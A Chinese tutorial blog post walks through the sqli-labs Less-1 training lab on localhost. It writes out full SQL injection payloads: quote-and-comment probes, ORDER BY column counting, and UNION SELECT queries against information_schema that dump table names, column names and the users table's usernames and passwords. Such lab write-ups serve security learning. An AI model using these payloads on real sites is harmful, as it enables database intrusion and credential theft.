sqli-labs Less-1

本文详细介绍如何通过SQL注入漏洞获取数据库信息的过程,包括发现注入点、确定字段数量、联合查询等步骤,并最终获取到了用户表中的账号密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.首先来到less-1

img_4c6336accdc59c7110bb38a88e0ad61d.png
1.png

img_c4781cd8f3de325e60fadb54d5692a65.png
2.png

2.请以数字值作为参数输入id。

  • url后面输入?id=1
img_aca6ff679218ae84c21a8e7597fbe519.png
3.png

大家可能此时与我不同的是

your sql statement is SELECT * FROM users WHERE id='1' LIMIT 0,1

这是为了方便我们自己看到底执行的sql语句是什么显示出来的。那么你也可以添加以下,方法如下:
编辑less-1下的index.php文件
将代码echo "your sql statement is ".$sql."<br>";插入到如下图所示位置

img_73696d4580ace231a3f6058f711bb1f5.png
4.png

之后刷新页面即可。
3.寻找注入点

  • 在正常的参数值后面后加一个英文字符 ',可以看到页面出现了异常,说明此处可能存在注入。
img_c2b87c32260877830fa9163550562cbd.png
5.png
  • 接下来在后面加入--+,发现页面显示正常,这是因为--+注释了后面的sql语句,即注入的'正好闭合了sql语句中的单引号,如下:
img_6921898d6ae5b85761a21455a7fbb91e.png
图片.png
  • 然后继续注入' and 1=1’ and 1=2,进一步确认注入点,如下:
    ' and 1=1页面显示正常,’ and 1=2页面显示不正常。
img_2d4aa4d0a6ee67f61ca376dc5efd512d.png
图片.png
img_4577e851a72f37ceae324e9cbf6fbbb5.png
图片.png

至此,我们可以确认此注入点存在sql注入

4.接下来用order by 语句猜有几个字段
实际操作中采用二分法。
当插入?id=1' order by 3 --+,页面正常显示:

url:

http://127.0.0.1/sqli-labs/Less-1/?id=1' 

img_5a8466783c502652d9ecf23784a298b8.png
6.png

当插入?id=1' order by 4 --+,页面异常:

img_70e11a76b34a7fabac8122886a37d04b.png
7.png

此时说明查询的表中有3个字段
5. 此时可以继续使用 union select联合查寻。

img_281b46adeb99cfa71e5e8ddfed9cf355.png
8.png

页面正常无变化,没关系,这是limit 限制了只显示一条结果,即前面id = 1 已经有一个结果了,那好,我们将前面设置为0,让它查不到结果看看.

url:    http://127.0.0.1/sqli-labs/Less-1/?id=0%27%20union%20select%201,2,3%20--+

img_ea9bc5d91091f73f39c10492f56c3f9a.png
9.png

惊喜吧!!看到2,3了吧。
说明第2、3个字段可以显示到页面
6. 先来看看常用查询的数据库,版本号,当前登录的账号信息吧!

img_172b5d191b9a14868f750bea91ac15a8.png
10.png
img_83b1109eb1ca3a9d93cdecfa1431bd76.png
11.png

可以查询到数据库名security,版本5.5.53,当前登录账户:root@localhost
7. 接下来查表名
url:

http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,table_name from information_schema.tables where table_schema = "security" --+
img_4f34a0cdbbd5ab631d298897a3867138.png
12.png

可以看到查询到一个表,接下来使用group_concat()函数将所有表列出来
url:

http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = "security" --+

img_7d9262c82fd855b891227b23365be9f2.png
13.png

可以看到一共四个表:emails,referers,uagents,users
8.接下来查关注的users表中字段
url:

http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = "users" and table_schema = "security" --+

img_9cec2493812a3edd15bf29f89be89f2b.png
14.png

9. 最后就是查看表中字段内容了
url:
http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,group_concat(username),group_concat(password) from users --+

img_ffa271345fc62f6cfd0b141a43e3e208.png
15.png

10.这样有点不美观,可以这样做:
url:

http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,concat_ws("~",username,password) from users --+
img_44f835f112cb0365689ea86061f5851f.png
16.png

显示了一个用户名密码,不爽:
url:

http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,group_concat(concat_ws("~",username,password)) from users --+
img_d5945a59a4168294050913a1c4d9f62a.png
17.png

这样就完美了,nice.

最后附图一张,information_schema数据库主要表结构

img_6152d30b7218c8f9dc7510aac1376935.png
image.png

说明:当数据库版本大于5以上,数据库中将有information_schema数据库,这个数据库中包含数据库里面所有数据库的表、字段以及数据库名字。
schemata 这张表存放了所有数据库的信息
tables 这张表存放了所有数据库的所有表的信息
columns 这张表存放了所有数据库的所有表中的字段信息

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值